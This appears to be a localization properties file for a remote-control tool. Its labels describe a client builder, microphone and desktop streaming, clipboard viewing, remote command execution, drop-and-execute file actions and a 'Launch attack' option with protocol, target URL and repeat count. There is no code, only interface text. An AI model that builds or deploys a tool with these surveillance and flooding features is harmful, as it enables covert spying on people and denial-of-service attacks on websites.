debug.question=Server or client?
debug.server=Server
debug.client=Client

server.port_question=Which port should the server be bind to?
server.port_error=Invalid port.
server.free_warning=The client won't be available until the device restarts.\r\n\
Continue?
server.yes=Yes
server.no=No
server.cancel=Cancel
server.tcp=TCP
server.udp=UDP
server.attack_message=Which protocol?
server.url_message=Type in a URL.
server.amount_question=How often?

builder.address_question=Which address should the client connect to?
builder.port_question=Which port?
builder.error=Something went wrong.

menu.file_management=File management
menu.surveillance=Surveillance
menu.utility=Utility
menu.other=Other

file_information.name=File name
file_information.path=Path
file_information.size=File size
file_information.directory=Directory
file_information.creation=Date of creation
file_information.last_access=Last access
file_information.last_modification=Last modification
file_information.bytes=Bytes

action.popup=Open popup
action.screenshot=Take screensot
action.desktop=Toggle desktop stream
action.voice=Toggle microphone stream
action.files=Browse files
action.command=Execute command
action.clipboard=Show clipboard
action.website=Open website
action.audio=Play audio
action.free=Free client
action.build=Client builder
action.attack=Launch attack
action.request_files=Request content
action.download=Download file
action.upload=Upload file here
action.execute=Execute file
action.delete=Delete file
action.new_directory=Create new directory
action.upload_execute=Upload and execute file
action.drop_file=Drop file
action.drop_execute=Drop and execute file
action.chat=Open chat
action.file_information=Get file information

column.name=Name
column.location=Location
column.address=IP address
column.os=Operating system
column.version=Version
column.desktop=Streaming desktop
column.voice=Streaming voice
column.ping=Ping